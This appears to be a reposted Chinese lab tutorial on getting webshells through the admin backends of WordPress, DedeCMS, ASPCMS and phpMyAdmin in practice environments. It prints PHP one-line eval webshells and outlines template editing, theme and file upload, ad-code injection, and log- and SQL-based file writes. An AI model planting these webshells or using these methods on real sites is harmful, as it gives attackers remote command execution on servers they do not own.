当前位置: 首页 > news >正文

常见CMS获取webshell的方法-靶场练习

一.wordpress拿去webshell的两种方法

1.后台修改模板获取websehll

1.1首先我们来到我们的vulhub靶场,然后启动我们的环境。命令:

cd /vulhub-master/wordpress/ pwnscriptum/

docker-compose up -d

2.然后输入:docker ps查看端口然后去访问

3.然后我们访问一下,来到首页后会叫我们创建用户,创建完成并登录

4.登录成功后如图片中的去操作

5.然后我们去访问这个404.php文件,文件位置为:/wp-content/themes/自己模板的名称/404.php

6.尝试执行命令,成功执行命令!

2.上传主题获取webshell

1.我们先下载一个模板文件,直接去百度搜索wordpress免费模板下载即可。

2.然后我们解压压缩包,并在文件里面写入一个1.php的木马文件,木马内容为:<?php
eval($_POST[cmd]);
?>

3.写好后再将文件压缩,然后上传

4.上传成功后会给你一个地址,我们去访问一下这个文件夹下的木马文件,并尝试执行命令可以看到成功执行。

二.DEDECMS获取webshell

1.通过文件上传器获取webshell

1.首先暗安装靶场:织梦 (DedeCMS) 官方网站 - 内容管理系统 - 上海卓卓网络科技有限公司

2.然后下载后解压在我们小皮面板的网站根目录下

3.然后去访问这个网站,然后填写数据库信息注册。

4.安装好后登录后台

5.然后来到文件上传的地方。

6.准备一个1.php木马文件文件内容:<?php @eval($_POST[cmd]);?>,然后上传文件。上传文件成功后可以看到文件地址,我们去访问一下。

7.成功访问到后尝试执行命令可以看到成功执行。

2.修改文件模板获取webshell

1.然后来到模板这里修改文件

2.然后我们点击修改,修改文件然后保存并更行

然后来到这里修改

3.修改完刷新后就可以看到命令执行了。

3.后台执行任意命令

1.首先我们来到广告界面,按照图片中操作

2.然后再按照托i暗中修改广告代码

3.然后我们来到这里查看路径

4.访问成功后我们使用蚁剑连接,成功连接

 三.ASPCMS获取websehll

1.首先我们安装好我们的靶场

2.然后我们如图所示可以看到这里可以修改幻灯片的配置。那我们就可以直接修改幻灯片的配置。

3.然后我们来到这个文件夹来修改文件

然后按照图片中的位置修改

4.然后我们去访问这个文件,成功访问到

5.然后我们取用木马连接工具连接木马

四.PhPMyadmin获取webshell

1.使用日志文件拿去shell

1.首先我们先安装PhPMyadmin

2.然后来到管理的网站,然后使用密码登录

3.接下来按照图片修改

5.在这里查询一句话木马,这样日志文件里面就会有这个一句话木马了。

6.去浏览器访问这个文件,然后去执行命令可以看到成功执行。

2.sql语句插入木马

1.我们输入sql插入语句

2.然后我们尝试去访问这个文件,并执行命令可以看到成功执行。

http://www.xdnf.cn/news/1212103.html

相关文章:

  • 基于 Hadoop 生态圈的数据仓库实践 —— OLAP 与数据可视化(三)
  • YOLOv5u:无锚点检测的革命性进步
  • 智能AI医疗物资/耗材管理系统升级改造方案分析
  • 【C++】类和对象(中)拷贝构造、赋值重载
  • BT131-800-ASEMI家电领域专用BT131-800
  • Hutool 的 WordTree(敏感词检测)
  • 第2章 cmd命令基础:常用基础命令(2)
  • 中国高铁从追赶到领跑的破壁之路
  • 磁盘io查看命令iostat与网络连接查看命令netstat
  • FFmpeg,如何插入SEI自定义数据
  • MidJourney精选图集与提示词生成器:AI创意灵感与高效提示词工具
  • 无监督MVSNet系列网络概述
  • 高效管理Hosts文件的终极工具
  • 【Qt开发】信号与槽(三)-> 自定义信号和槽
  • Python 程序设计讲义(46):组合数据类型——集合类型:集合间运算
  • 解决 Node.js 托管 React 静态资源的跨域问题
  • 力扣54:螺旋矩阵
  • 疯狂星期四文案网第24天运营日记
  • 永磁同步电机FOC控制----电流采样的实现
  • 【Lambda】flatMap使用案例
  • 字节跳动“扣子”(Coze)开源:AI智能体生态的技术革命
  • 从结构到交互:HTML5进阶开发全解析——语义化标签、Canvas绘图与表单设计实战
  • 微软OpenAI展开深入谈判
  • DIV 指令概述
  • 视觉语言模型在视觉任务上的研究综述
  • HTML第一次作业
  • JavaWeb 进阶:Vue.js 与 Spring Boot 全栈开发实战(Java 开发者视角)
  • 【数据结构初阶】--二叉树(四)
  • Prometheus-1--什么是Prometheus?
  • Docker网络技术深度研究与实战手册